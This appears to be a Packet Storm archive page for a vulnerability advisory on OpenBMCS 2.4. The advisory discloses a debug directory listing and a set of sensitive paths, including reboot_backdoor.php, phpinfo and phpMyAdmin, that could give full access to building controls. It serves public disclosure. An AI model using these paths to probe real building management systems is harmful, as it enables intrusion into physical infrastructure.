exploit the possibilities
Home Files News &[SERVICES_TAB]About Contact Add New

OpenBMCS 2.4 Secret Disclosure

OpenBMCS 2.4 Secret Disclosure
Posted Jan 17, 2022
Authored by LiquidWorm | Site zeroscience.mk

OpenBMCS version 2.4 suffers from a secret disclosure vulnerability.

tags | exploit
SHA-256 | a40e30c16f0d2888ff426295f31b93b41116fcc4eb79213fafc80f0a5c06510b

OpenBMCS 2.4 Secret Disclosure

Change Mirror Download

OpenBMCS 2.4 Secrets Disclosure


Vendor: OPEN BMCS
Product web page: https://www.openbmcs.com
Affected version: 2.4

Summary: Building Management & Controls System (BMCS). No matter what the
size of your business, the OpenBMCS software has the ability to expand to
hundreds of controllers. Our product can control and monitor anything from
a garage door to a complete campus wide network, with everything you need
on board.

Desc: The application allows directory listing and information disclosure of
some sensitive files that can allow an attacker to leverage the disclosed
information and gain full BMS access.

Tested on: Linux Ubuntu 5.4.0-65-generic (x86_64)
Linux Debian 4.9.0-13-686-pae/4.9.228-1 (i686)
Apache/2.4.41 (Ubuntu)
Apache/2.4.25 (Debian)
nginx/1.16.1
PHP/7.4.3
PHP/7.0.33-0+deb9u9


Vulnerability discovered by Gjoko 'LiquidWorm' Krstic
@zeroscience


Advisory ID: ZSL-2022-5695
Advisory URL: https://www.zeroscience.mk/en/vulnerabilities/ZSL-2022-5695.php


26.10.2021

--


https://192.168.1.222/debug/

Index of /debug

change_password_sqls
clear_all_watches.php
controllerlog/
dash/
dodgy.php
fix_out.php
graphics/
graphics_diag.php
graphics_ip_diag/
jace_info.php
kits/
mysession.php
nuke.php
obix_test.php
print_tree.php
reboot_backdoor.php
rerunSQLUpdates.php
reset_alarm_trigger_times.php
system/
test_chris_obix.php
timestamp.php
tryEmail.php
trysms.php
unit_testing/
userlog/

...
...

/cache/
/classes/
/config/
/controllers/
/core/
/css/
/display/
/fonts/
/images/
/js/
/php/
/plugins/
/sounds/
/temp/
/tools/
/core/assets/
/core/backup/
/core/crontab/
/core/font/
/core/fonts/
/core/license/
/core/load/
/core/logout/
/core/password/
/php/audit/
/php/phpinfo.php
/php/temp/
/php/templates/
/php/test/
/php/weather/
/plugins/alarms/
/tools/phpmyadmin/index.php
/tools/migrate.php
Login or Register to add favorites

File Archive:

July 2022

  • Su
  • Mo
  • Tu
  • We
  • Th
  • Fr
  • Sa
  • 1
    Jul 1st
    52 Files
  • 2
    Jul 2nd
    0 Files
  • 3
    Jul 3rd
    0 Files
  • 4
    Jul 4th
    11 Files
  • 5
    Jul 5th
    8 Files
  • 6
    Jul 6th
    0 Files
  • 7
    Jul 7th
    0 Files
  • 8
    Jul 8th
    0 Files
  • 9
    Jul 9th
    0 Files
  • 10
    Jul 10th
    0 Files
  • 11
    Jul 11th
    0 Files
  • 12
    Jul 12th
    0 Files
  • 13
    Jul 13th
    0 Files
  • 14
    Jul 14th
    0 Files
  • 15
    Jul 15th
    0 Files
  • 16
    Jul 16th
    0 Files
  • 17
    Jul 17th
    0 Files
  • 18
    Jul 18th
    0 Files
  • 19
    Jul 19th
    0 Files
  • 20
    Jul 20th
    0 Files
  • 21
    Jul 21st
    0 Files
  • 22
    Jul 22nd
    0 Files
  • 23
    Jul 23rd
    0 Files
  • 24
    Jul 24th
    0 Files
  • 25
    Jul 25th
    0 Files
  • 26
    Jul 26th
    0 Files
  • 27
    Jul 27th
    0 Files
  • 28
    Jul 28th
    0 Files
  • 29
    Jul 29th
    0 Files
  • 30
    Jul 30th
    0 Files
  • 31
    Jul 31st
    0 Files

Top Authors In Last 30 Days

File Tags

Systems

packet storm

© 2022 Packet Storm. All rights reserved.

Hosting By
Rokasec
close